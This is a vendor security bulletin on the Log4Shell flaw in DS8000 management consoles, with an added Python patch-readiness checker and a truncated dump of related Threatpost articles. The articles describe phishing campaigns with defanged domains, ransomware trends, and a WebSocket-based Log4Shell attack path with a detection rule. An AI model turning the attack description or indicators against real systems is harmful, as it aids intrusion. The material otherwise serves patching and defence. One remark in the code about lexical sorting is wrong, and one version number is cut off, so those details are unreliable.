## Summary
The DS8000 Hardware Management Console (HMC) uses Apache Log4j, which is subject to CVE-2021-44228 and may allow a remote attacker to execute arbitrary code on the system.
## Vulnerability Details
**CVEID:** [CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>)
**DESCRIPTION:** Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure of its JNDI features to protect against attacker-controlled LDAP and other JNDI-related endpoints. By sending a specially crafted string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam.
CVSS Base Score: 10
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
## Affected Products and Versions
Affected Product(s)| Version(s)
---|---
R9.1| 89.1x.0.0
R9.2| 89.2x.0.0
R8.5| 88.5x.x.x
## Remediation/Fixes
IBM strongly recommends addressing the vulnerability now.
All versions of the DS8900F and DS8880 are potentially impacted. Customers should either schedule Remote Code Load (RCL) via <https://www.ibm.com/support/pages/ibm-remote-code-load> or contact IBM support, and request that ICS CVE_2021_44228_v1.0 or CVE_2021_44228_v1.1 be applied to their systems.
DS8900F systems at release 9.0 are impacted and must upgrade to R9.1 or above.
* DS8900F systems below R9.1 SP 2 (89.12.8.0) must update to at least 89.12.8.0, and preferably to at least the recommended release (89.13.7.0 or 89.21.28.), before applying the ICS, which updates the Log4j package to v2.17.0.
* DS8880 systems below R8.5 GA2 (88.50.184.0) must update to at least 88.50.184.0, and preferably to at least the recommended release (88.58.3.0), before applying the ICS, which updates the Log4j package to v2.17.0.
For the current recommended code releases, see <https://www.ibm.com/support/pages/ds8000-code-recommendation>.
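As an added example (not IBM's code or tooling), the following pre-check turns the thresholds above into an inventory triage. It parses DS8000 code levels numerically, so that a level such as 89.3.x is not mistaken for a newer level than 89.12.8.0 by a plain string comparison, and reports for each system whether the ICS may be applied now or a code update must come first. Two assumptions are labelled in the code: levels in the 89.0x range are treated as release 9.0 (inferred from the table's 89.1x/89.2x pattern), and the inventory is constructed sample data.

```python
"""Pre-check for the DS8000 Log4j ICS path described in the bulletin.

Added example, not IBM's tooling. It encodes the bulletin's thresholds:
  - DS8900F (levels 89.*): release 9.0 must go to R9.1 or above; anything
    below 89.12.8.0 must update to at least 89.12.8.0 before the ICS.
  - DS8880 (levels 88.*): anything below 88.50.184.0 must update to at
    least 88.50.184.0 before the ICS.
The recommended levels (89.13.7.0, 88.58.3.0) are those named in the bulletin.
"""
from dataclasses import dataclass

MIN_DS8900F = (89, 12, 8, 0)    # R9.1 SP 2 per the bulletin
MIN_DS8880 = (88, 50, 184, 0)   # R8.5 GA2 per the bulletin
RECOMMENDED_DS8900F = (89, 13, 7, 0)
RECOMMENDED_DS8880 = (88, 58, 3, 0)


def parse_level(level: str) -> tuple:
    """Turn a DS8000 code level like '89.12.8.0' into a comparable int tuple.

    Raises ValueError on anything that is not four dot-separated integers, so
    a typo in an inventory file fails loudly instead of being compared as a
    string (where '89.3.12.0' would wrongly sort after '89.12.8.0').
    """
    parts = level.strip().split(".")
    if len(parts) != 4 or not all(p.isdigit() for p in parts):
        raise ValueError(f"not a DS8000 code level: {level!r}")
    return tuple(int(p) for p in parts)


@dataclass
class Verdict:
    system: str
    level: str
    ics_ready: bool   # may the ICS be applied at this code level?
    action: str       # what the operator should do first


def check_system(system: str, level: str) -> Verdict:
    """Apply the bulletin's rules to one system's current code level."""
    lvl = parse_level(level)
    if lvl[0] == 89:  # DS8900F family
        # Assumption: 89.0x levels are release 9.0 (the table shows R9.1 as
        # 89.1x and R9.2 as 89.2x); the bulletin says R9.0 must go to R9.1+.
        if lvl[1] < 10:
            return Verdict(system, level, False,
                           "upgrade to R9.1 or above, then apply ICS")
        if lvl < MIN_DS8900F:
            return Verdict(system, level, False,
                           "update to at least 89.12.8.0 (preferably 89.13.7.0), then apply ICS")
        hint = "" if lvl >= RECOMMENDED_DS8900F else " (recommended level 89.13.7.0 not yet reached)"
        return Verdict(system, level, True, "apply ICS CVE_2021_44228_v1.x" + hint)
    if lvl[0] == 88:  # DS8880 family
        if lvl < MIN_DS8880:
            return Verdict(system, level, False,
                           "update to at least 88.50.184.0 (preferably 88.58.3.0), then apply ICS")
        hint = "" if lvl >= RECOMMENDED_DS8880 else " (recommended level 88.58.3.0 not yet reached)"
        return Verdict(system, level, True, "apply ICS CVE_2021_44228_v1.x" + hint)
    return Verdict(system, level, False,
                   "code level not covered by this bulletin (expected 88.* or 89.*)")


def triage(inventory) -> list:
    """Return verdicts for the systems that cannot take the ICS yet."""
    return [v for v in (check_system(name, lvl) for name, lvl in inventory) if not v.ics_ready]


# Constructed sample inventory (hostnames and levels are made up for illustration).
SAMPLE_INVENTORY = [
    ("ds8950-a", "89.12.8.0"),    # exactly the R9.1 SP 2 minimum: ICS-ready
    ("ds8950-b", "89.11.4.0"),    # below minimum: update first
    ("ds8910-c", "89.3.12.0"),    # R9.0 (assumed): must upgrade to R9.1+
    ("ds8886-d", "88.50.184.0"),  # exactly the R8.5 GA2 minimum: ICS-ready
    ("ds8886-e", "88.42.0.0"),    # below minimum: update first
]

if __name__ == "__main__":
    for v in (check_system(n, l) for n, l in SAMPLE_INVENTORY):
        status = "READY  " if v.ics_ready else "BLOCKED"
        print(f"{status} {v.system:<10} {v.level:<12} {v.action}")
```

Run it as a script to see the per-system verdicts, or import `triage()` and feed it the output of whatever inventory export your site keeps; the point of the numeric tuple comparison is that the three blocked hosts above are caught even though two of their level strings sort "higher" than the minimum lexically.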
## Workarounds and Mitigations
None
## Get Notified about Future Security Bulletins
Subscribe to [My Notifications](<http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.
### References
[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> "Link resides outside of ibm.com")
[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> "Link resides outside of ibm.com")
## Related Information
[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>)
[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)
## Acknowledgement
## Change History
16 Dec 2021: Initial Publication
*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.
## Disclaimer
Review the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.
## Document Location
Worldwide
{"threatpost": [{"lastseen": "2022-03-09T15:37:46", "description": "While Russia is fighting a physical war on the ground against Ukraine, advanced persistent threat (APT) groups affiliated with or backing Vladimir Putin\u2019s government are ramping up phishing and other attacks against Ukrainian and European targets in cyberspace, Google is warning.\n\nResearchers from Google\u2019s Threat Analysis Group (TAG) have seen an increase in activity ranging \u201cfrom espionage to phishing campaigns\u201d from threat groups known as FancyBear/APT28 and Ghostwriter/UNC1151, Shane Huntley, director of software engineering at Google TAG, wrote in a [blog post](<https://blog.google/threat-analysis-group/update-threat-landscape-ukraine/>) published Monday. The former has been attributed to Russia\u2019s GRU intelligence agency, and the latter is an actor that Ukraine previously said is part of the Belarusian Ministry of Defense.\n\nMeanwhile, there has been a recent spate of distributed denial-of-service (DDoS) attacks against Ukrainian government sites, such as the Ministry of Foreign Affairs and the Ministry of Internal Affairs, as well as key services that help Ukrainians find information, such as Liveuamap, according to Google TAG.\n\nChina\u2019s Mustang Panda also has joined the fray, using the war in Ukraine to target European entities with lures related to the Ukrainian invasion in a recent phishing campaign. 
China\u2019s government is one of the few around the world backing Putin in the conflict.\n\n\u201cWe\u2019re sharing this information to help raise awareness among the security community and high risk users,\u201d Huntley wrote in the post.\n\n## **Phishing Flurry**\n\nFancy Bear, the APT behind attacks against the [2020 Tokyo Olympics](<https://threatpost.com/cyberattacks-sporting-anti-doping-orgs-as-2020-olympics-loom/149634/>) and [elections in the European Union](<https://threatpost.com/cybercriminals-impersonate-russian-apt-fancy-bear-to-launch-ddos-attacks/149578/>), most recently has been targeting users of ukr.net \u2013 owned by the Ukrainian media company URKNet \u2013 with \u201cseveral large credential phishing campaigns,\u201d Huntley wrote.\n\n\u201cThe phishing emails are sent from a large number of compromised accounts (non-Gmail/Google), and include links to attacker controlled domains,\u201d according to the post.\n\nIn two recent campaigns, TAG saw attackers using newly created Blogspot domains as the initial landing page, which then redirected targets to credential phishing pages. At this time, all known attacker-controlled Blogspot domains have been taken down, Huntley added.\n\nMeanwhile, Ghostwriter has conducted similarly motivated phishing campaigns over the past week against Polish and Ukrainian government and military organizations, according to Google TAG. The group also has been targeting webmail users from the following providers in the region: i.ua, meta.ua, rambler.ru, ukr.net, wp.pl and yandex.ru.\n\nGoogle TAG blocked a number of credential phishing domains that researchers observed during the campaigns through Google Safe Browsing, according to the post. 
Those domains included the following: accounts[.]secure-ua[.]website, i[.]ua-passport[.]top, login[.]creditals-email[.]space, post[.]mil-gov[.]space and verify[.]rambler-profile[.]site.\n\n## **Capitalizing on Conflict**\n\nNot to be outdone, China\u2019s Mustang Panda, aka Temp.Hex**,** HoneyMyte, TA416 or RedDelta, is using phishing lures related to the conflict in the Ukraine to target European organizations.\n\n\u201cTAG identified malicious attachments with file names such as [\u2018Situation at the EU borders with Ukraine.zip\u2019](<https://www.virustotal.com/gui/file/8a7fbafe9f3395272548e5aadeb1af07baeb65d7859e7a1560f580455d7b1fac/>) which contain an executable of the same name that is a basic downloader,\u201d Huntley explained in the post. When executed, the file downloads several additional files that install the final, malicious payload, according to TAG.\n\nWhile Huntley noted that targeted Europe represents a shift for the threat actor \u2013 which typically targets entities in Southeast Asia \u2013 Mustang Panda has been active against EU entities before, most notably targeting Rome\u2019s Vatican and Catholic Church-related organizations with [a spearphishing campaign](<https://threatpost.com/hackers-continue-cyberattacks-against-vatican-catholic-orgs/159306/>) in September 2020.\n\nTo mitigate the APT\u2019s latest phishing attacks, TAG has alerted relevant authorities of its findings, Huntley noted.\n\n## **Expanding DDoS Protection**\n\nAs APTs step up phishing attacks against Ukrainian targets, key government and service-oriented websites in the country also are facing a new barrage of DDoS attacks, as mentioned.\n\nAs these attacks are likely to continue, Google has expanded eligibility for [Project Shield](<https://projectshield.withgoogle.com/landing>), the company\u2019s free protection against DDoS attacks, to \u201cUkrainian government websites, embassies worldwide and other governments in close proximity to the conflict,\u201d Huntley 
wrote. More than 150 websites in Ukraine, including many news organizations, are currently using the service.\n\nProject Shield allows Google to absorb the bad traffic in a DDoS attack so the targeted organization can continue operating and defend against these attacks, according to the post. The company is recommending that eligible organizations[ register](<https://support.projectshield.withgoogle.com/s/?language=en_US>) for Project Shield in the wake of increased DDoS attack activity, Huntley wrote.\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** sked for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-09T14:07:55", "type": "threatpost", "title": "Russian APTs Furiously Phish Ukraine \u2013 Google", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": 
"NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-09T14:07:55", "id": "THREATPOST:751A0E2371F134F90F39C20AB70C1E2A", "href": "https://threatpost.com/russian-apts-phishing-ukraine-google/178819/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-23T17:38:38", "description": "What\u2019s old in ransomware is new again. Or, more accurately, never really went away.\n\nNew analysis shows that for a years-old malware, [WannaCry](<https://threatpost.com/one-year-after-wannacry-a-fundamentally-changed-threat-landscape/132047/>) is still a viciously active pest. The self-propagating ransomware [cryptoworm](<https://threatpost.com/meet-the-cryptoworm-the-future-of-ransomware/117330/>) that\u2019s been parasitizing victims since 2017 was the top most detected ransomware family by far in January 2022, researchers found.\n\n[](<https://bit.ly/34NwVmo>)\n\nClick to Register for FREE\n\nOut of 10.5 million malware detections from Jan. 1 \u2013 30, WannaCry showed up in 43 percent, as shown in the chart below.\n\nThe runner-up at No. 2 was GandCrab, which showed up in 13 percent of detections, in spite of the ransomware-as-a-service (RaaS) gang having [hung up its spurs](<https://threatpost.com/gandcrab-ransomware-shutters/145267/>) way back in 2019 (though the gang [resurfaced](<https://threatpost.com/gandcrab-operators-resurface-revile-malware/148631/>) with REvil malware months later).\n\nWhat\u2019s up with zombie ransomwares, still pumping out infection attempts years after they (supposedly) said sayonara? It\u2019s attributable to \u201cautomatic campaigns that were never turned off,\u201d Bitdefender said.\n\nMartin Zugec, technical solutions director at Bitdefender, told Threatpost that there are multiple reasons why these old ransomware families are still visible in the company\u2019s telemetry. 
\u201cWhile the first inclination would be to attribute detections to false positives \u2013 for example, detections from malware collectors or testing systems of security researchers \u2013 we extensively process our data to exclude such false detections,\u201d he noted.\n\nThat leaves one possible explanation being \u201cmalicious websites that are still automatically spreading malicious samples,\u201d or what he called \u201cabandoware.\u201d\n\nAnother common reason is ransomware that has similar code to one of the older ransomware families and is triggering detections, Zugec suggested: \u201cFor example, code sold to another ransomware group.\u201d\n\nAlternatively, it could be a competing group trying to \u201chijack\u201d the ransomware operation and collect the ransom, he added. Or, then again, it could be attributed to ransomware operators faking their business shutdowns, then coming back under a new name \u201cbut often using the same (or very similar) code,\u201d he said, with a relatively recent example of a resurrected group being [Cerber](<https://threatpost.com/ransomware-volumes-record-highs-2021/168327/>).\n\nThe newest numbers that show WannaCry and GandCrab refer to ransomware detections, mind you, as opposed to infections. As well, the number of detected ransomware families varies by month, \u201cdepending on the current ransomware campaigns in different countries\u201d according to Bitdefender\u2019s monthly [Threat Debrief](<https://businessinsights.bitdefender.com/bitdefender-threat-debrief-february-2022>), published Wednesday. In that report, the company said that researchers had identified 202 ransomware families in January.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/22182951/Screen-Shot-2022-02-22-at-6.28.48-PM-e1645572658809.png>)\n\nTop 10 ransomware families detected in January 2022. 
Source: Bitdefender.\n\n## Who/What Felt the January Malware Chill\n\nBitdefender researchers spotted ransomware streaming in from 149 countries in January. The plague continues to spread around the world, but the United States is the malware\u2019s favorite haunt, accounting for 24 percent of detections: the most of any country. Canada was next up, at 15 percent.\n\n\u201cMany ransomware attacks continue to be opportunistic, and the size of population is correlated to the number of detections,\u201d according to the company\u2019s threat report.\n\nWith regards to most-targeted industries, at the top of the list was government, accounting for 26 percent of detections, followed by telecommunications at 24 percent, education and research at 24 percent, and technology, which trailed at 9 percent.\n\n## New FluBot & TeaBot Campaigns\n\nJanuary also brought two new mobile banking malware [campaigns](<https://www.bitdefender.com/blog/labs/new-flubot-and-teabot-global-malware-campaigns-discovered/>) serving up the banking trojans [FluBot and TeaBot](<https://threatpost.com/threat-actors-androids-flubot-teabot-campaigns/177991/>). 
Last month, Bitdefender researchers discovered a raft of active campaigns that were flooding Android devices with the trojans through smishing and malicious Google Play apps that targeted victims with fly-by attacks.\n\nAs Bitdefender Labs said last month, researchers intercepted more than 100,000 malicious SMS messages trying to distribute Flubot malware since the beginning of December.\n\nCybercrooks\u2019 zest for [mobile malware](<https://threatpost.com/gaming-banking-trojans-mobile-malware/178571/>) makes sense, given that \u201caccess to cryptocurrency trading and banking on devices makes mobile platforms an attractive target for cybercriminals,\u201d according to the report.\n\nA separate [report](<https://securelist.com/mobile-malware-evolution-2021/105876/>) on mobile malware, published by Kaspersky on Tuesday, documented a downward trend in the number of attacks on mobile users year over year from 2021 to 2021. However, the attacks, though less numerous, are \u201cmore sophisticated in terms of both malware functionality and vectors,\u201d according to Kaspersky.\n\nSome examples of banking trojans\u2019 new tricks, as pointed out by Kaspersky: In 2021, the Fakecalls banker, which targets Korean mobile users, was upgraded to drop outgoing calls to the victim\u2019s bank and to play pre-recorded operator responses stored in the trojan\u2019s body. As well, the Sova banker, which steals [cookies](<https://encyclopedia.kaspersky.com/glossary/cookie/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), is now enabling attackers to access a target\u2019s current session and personal mobile banking account without knowing the login credentials.\n\n## Most Detected Android Trojans\n\nMeanwhile, there\u2019s a growing laundry list of Android trojans with ever-more-creative ways to stick it to mobile users. 
Below is a chart of the Top 10 Android trojans Bitdefender detected in January, along with a list of what rudeness they can get up to.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/22222604/Screen-Shot-2022-02-22-at-10.25.56-PM-e1645586858362.png>)\n\nTop 10 Android trojans. Source: Bitdefender.\n\n * **Downloader.DN** \u2013 Repacked applications taken from Google App Store and bundled with aggressive adware. Some adware downloads other malware variants.\n * **InfoStealer.XY** \u2013 Obfuscated applications that masquerade as mobile antiviruses. When the malware app is first run, it checks if there is any AV solution installed and it tricks the user to uninstall it. It exfiltrates sensitive data, downloads and installs other malware and displays adware.\n * **HiddenApp.AID** \u2013 Aggressive adware that impersonates adblock applications. When running for the first time, it asks permission to display on top of other apps. With this permission, the application can hide from the launcher.\n * **SpyAgent.DW \u2013 **Applications that exfiltrate sensitive data like SMS messages, call logs, contacts, or GPS location.\n * **SpyAgent.DW, EA** \u2013 Applications that exfiltrate sensitive data.\n * **Dropper.AIF \u2013 **Polymorphic applications that drop and install encrypted modules. After the first run, their icons are hidden from the launcher.\n * **Banker.XX \u2013 **Applications that impersonate Korean banking applications to record audio and video, collect sensitive information and upload it to a C&C server.\n * **Banker.XJ, YM \u2013 **Applications that drop and install encrypted modules. This trojan grants device admin privileges, and gains access to manage phone calls and text messages. After deploying, it maintains a connection with the C&C server to receive command and upload sensitive information. 
This detection includes variants of TeaBot and FluBot.\n * **Banker.VF** \u2013 Polymorphic applications that impersonate legit apps (Google, Facebook, Sagawa Express \u2026). Once installed, it locates banking applications installed on the device and tries to download a trojanized version from the C&C server.\n\n## Chipping Away Protection in App Stores\n\nUnfortunately for mobile users \u2013 the recipients of these newfangled trojans \u2013 it\u2019s not looking good for the mobile app behemoths\u2019 quests to secure their app stores, Bitdefender asserted.\n\n\u201cTight control over application approval by app store owners is the primary protection provided for mobile devices, but it\u2019s becoming insufficient and [challenged by authorities](<https://news.yahoo.com/app-store-crackdown-advances-110050109.html>) in Europe and the U.S. who have introduced legislation to open up the ecosystem,\u201d according to its report. Such regulation has been introduced in the United States, the European Union, the Republic of Korea, the Netherlands and elsewhere, as Microsoft noted in a Feb. 9 post titled [Adapting ahead of regulation: a principled approach to app stores](<https://blogs.microsoft.com/on-the-issues/2022/02/09/open-app-store-principles-activision-blizzard/>).\n\nIn that post, Microsoft President Brad Smith announced a new set of Open App Store Principles for the Microsoft Store on Windows as well as for the \u201cnext-generation marketplaces\u201d it plans to build for games.\n\nMicrosoft has spent a few decades dealing with antitrust rules, Smith pointed out. 
Change isn\u2019t easy, but it\u2019s not impossible to deal with countries\u2019 adoption of new tech regulation \u201cthat promotes competition while also protecting fundamental values like privacy and national and cyber security,\u201d he wrote.\n\n## App Stores: Too Big for Their Britches?\n\nAt this point, the big app stores are sprawling like Walmart on steroids, Bitdefender pointed out, making it ever tougher to police them for malware, adware or \u201criskware\u201d \u2013 i.e., legitimate apps that can turn into threats due to security vulnerability, software incompatibility or legal violations.\n\n\u201cApple\u2019s App Store is approaching five million applications, and the Google Play Store has close to three million which makes it unwieldy to control,\u201d Bitdefender researchers contended.\n\n\u201cWhile malicious applications are quickly removed after discovery by platform owners, they often have hundreds of thousands of downloads before they are flagged.\u201d they continued.\n\nA case in point is the Joker mobile malware: The [malware](<https://threatpost.com/malicious-joker-app-downloads-google-play/177139/>), which zaps victims with premium SMS charges, popped up yet again on Google Play last year, in a mobile app called Color Message. From there, it snuck into a jaw-dropping number of devices: more than a half-million downloads before the store collared it.\n\nExpect more of the same, Bitdefender predicted. \u201cWhether an open or closed ecosystem \u2013 mobile malware will only increase and additional layers of protection on top of the gatekeeper-app-store model is recommended as part of basic mobile hygiene,\u201d according to the report.\n\n022322 12:33 UPDATE: Added input from Bitdefender\u2019s Martin Zugec.\n\n**_Join Threatpost on Wed. 
Feb 23 at 2 PM ET for a [LIVE roundtable discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, focused on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. [REGISTER NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) and please Tweet us your questions ahead of time @Threatpost so they can be included in the discussion._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-23T14:00:22", "type": "threatpost", "title": "Creaky Old WannaCry, GandCrab Top the Ransomware Scene", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-23T14:00:22", "id": "THREATPOST:8601D6EF6AB3201E582A218391B19C3F", "href": 
"https://threatpost.com/wannacry-gandcrab-top-ransomware-scene/178589/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T21:55:20", "description": "Defenders will once again be busy beavers this weekend: There\u2019s an alternative attack vector for the ubiquitous Log4j [vulnerability](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>), which relies on a basic Javascript WebSocket connection to trigger remote code-execution (RCE) on servers locally, via drive-by compromise.\n\nIn other words, an exploit can affect services running as localhost in internal systems that are not exposed to any network.\n\nThat\u2019s according to researchers at Blumira, who noted that the discovery eviscerates the notion that Log4Shell attacks [are limited to](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) exposed vulnerable web servers.\n\n\u201cThis newly discovered attack vector means that anyone with a vulnerable Log4j version can be exploited through the path of a listening server on their machine, or local network through browsing to a website, and triggering the vulnerability,\u201d researchers said in a Friday note to Threatpost.\n\n* * *\n\n**Check out all of our Log4Shell coverage:**\n\n * [Relentless Log4j Attacks Include State Actors, Possible Worm](<https://threatpost.com/log4j-attacks-state-actors-worm/177088/>)\n * [What the Log4Shell Bug Means for SMBs: Experts Weigh In](<https://threatpost.com/log4shell-bug-smbs-experts/177021/>)\n * [How to Buy Precious Patching Time as Log4j Exploits Fly (Podcast)](<https://threatpost.com/patching-time-log4j-exploits-vaccine/177017/>)\n * [Apache\u2019s Fix for Log4Shell Can Lead to DoS Attacks](<https://threatpost.com/apache-patch-log4shell-log4j-dos-attacks/177064/>)\n * _[Where the Latest Log4Shell Attacks Are Coming From](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>)_\n * [Log4Shell Is Spawning Even 
Nastier Mutations](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>)\n * [SAP Kicks Log4Shell Vulnerability Out of 20 Apps](<https://threatpost.com/sap-log4shell-vulnerability-apps/177069/>)\n * [Zero Day in Ubiquitous Apache Log4j Tool Under Active Attack](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>)\n\n* * *\n\nThis means there are several new malicious use cases for an exploit, beyond the now-well-documented ability to open a shell with a single line of code to drop malware on internet-facing web servers.\n\n\u201c[New use cases include everything] from malvertisting to creating watering holes for drive-by attacks,\u201d said Matthew Warner, CTO and co-founder of Blumira, in a technical post.\n\n## **Using WebSockets for Malicious Gain**\n\nWebSockets enables communication between a web browser and web applications, like chats and alerting on websites. They generally allow the browser to quickly send data back and forth to these types of apps, but they\u2019re also used for host-fingerprinting and port-scanning.\n\nWarner explained in his posting that WebSockets is also fraught with security risk.\n\n\u201cWebSockets are not restricted by same-origin policies like a normal cross-domain HTTP request,\u201d he explained. \u201cThey expect the server itself to validate the origin of the request. While they are useful, they also introduce a fair amount of risk as they do not include many security controls to limit their utilization.\u201d\n\nIn the Log4j case, an attacker would make malicious requests via WebSockets to a potentially vulnerable localhost or local network server. The targets don\u2019t have to be exposed to the internet.\n\n\u201cWebSockets have previously been used for port-scanning internal systems, but this represents one of the first remote code execution exploits being relayed by WebSockets,\u201d said Jake Williams, co-founder and CTO at BreachQuest, via email. 
\u201cThis shouldn\u2019t change anyone\u2019s position on vulnerability management though. Organizations should be pushing to patch quickly and mitigate by preventing outbound connections from potentially vulnerable services where patching is not an option.\u201d\n\n## **Local Attack Scenario for Log4Shell**\n\n_Warner offered a detailed breakdown of his proof-of-concept (PoC) for the attack in [the posting](<https://www.blumira.com/analysis-log4shell-local-trigger/>); below is a truncated explanation._\n\n**Step 1: **From a watering-hole server with the affected Log4j2 vulnerability installed, an attacker would trigger a file path URL from the browser with a WebSocket connection. Blumira used a basic Javascript WebSocket connection in the PoC, but Warner noted that \u201cthis does not necessarily need to be localhost; WebSockets allow for connection to any IP and easily could iterate private IP space.\u201d\n\n**Step 2:** As the page loads, it will initiate a local WebSocket connection, connect to the vulnerable listening server, and connect out over an identified type of connection based on a Java Naming and Directory Interface (JNDI) connection string \u2013 a technique that\u2019s similar to WebSockets\u2019 localhost port-scanning used for fingerprinting hosts.\n\n**Step 3:** Once the victim\u2019s host connects to an open port to a local service or a service accessible to the host itself, an attacker can then drop an exploit string in path or parameters. 
\u201cWhen this happens, the vulnerable host calls out to the exploit server, loads the attacker\u2019s class, and executes it with java.exe as the parent process,\u201d according to Warner.\n\n## **Detection and Remediation**\n\nThe bad news is that this also a stealthy approach, according to the analysis: \u201cWebSocket connections within the host can be difficult to gain deep visibility into, which increases the complexity of detection for this attack.\u201d That\u2019s because WebSocket connections silently initiate when a webpage loads, with no direct control by the client itself. However, Warner noted that there are ways to get around this.\n\nTo detect a possible attack, Warner recommended looking for instances of \u201c.*/java.exe\u201d being used as the parent process for \u201ccmd.exe/powershell.exe.\u201d\n\n\u201cThis is potentially very noisy,\u201d Warner said.\n\nAnd finally, organizations should also make sure they\u2019re set up to detect the presence of Cobalt Strike, TrickBot and related common attacker tools.\n\nTo identify where Log4j is used within local environments, there are publicly available scanning scripts, researchers noted, to identify the libraries used locally. 
Here are two:\n\n * Windows PoSh \u2013 https://github.com/N-able/ScriptsAndAutomationPolicies/blob/master/Vulnerability%20-%20CVE-2021-44228%20(Log4j)/get-log4jrcevulnerability.ps1\n * Cross platform \u2013 https://github.com/hillu/local-log4j-vuln-scanner/releases\n\nTo mitigate the risk completely, organizations should update all local development efforts, internal applications and internet-facing environments to Log4j 2.16 ASAP, including any custom applications.\n\nIn the meantime, users can implement egress filtering, which can restrict the callback required for the actual exploit to land, and can use tools like [NoScript Java-blocker](<https://noscript.net/>) on untrusted external sites to avoid Javascript triggering WebSocket connections.\n\n\u201cThis news does mean that relying on web application firewalls, or other network defenses, is no longer an effective mitigation,\u201d John Bambenek, principal threat hunter at Netenrich, said via email. \u201cPatching remains the single most important step an organization can take.\u201d\n\n**_Check out our free _**[**_upcoming live and on-demand online town halls_**](<https://threatpost.com/category/webinars/>) **_\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, 